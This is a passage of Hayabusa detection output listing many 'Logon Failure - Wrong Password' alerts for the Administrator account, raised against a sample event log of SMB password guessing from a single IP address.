NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: 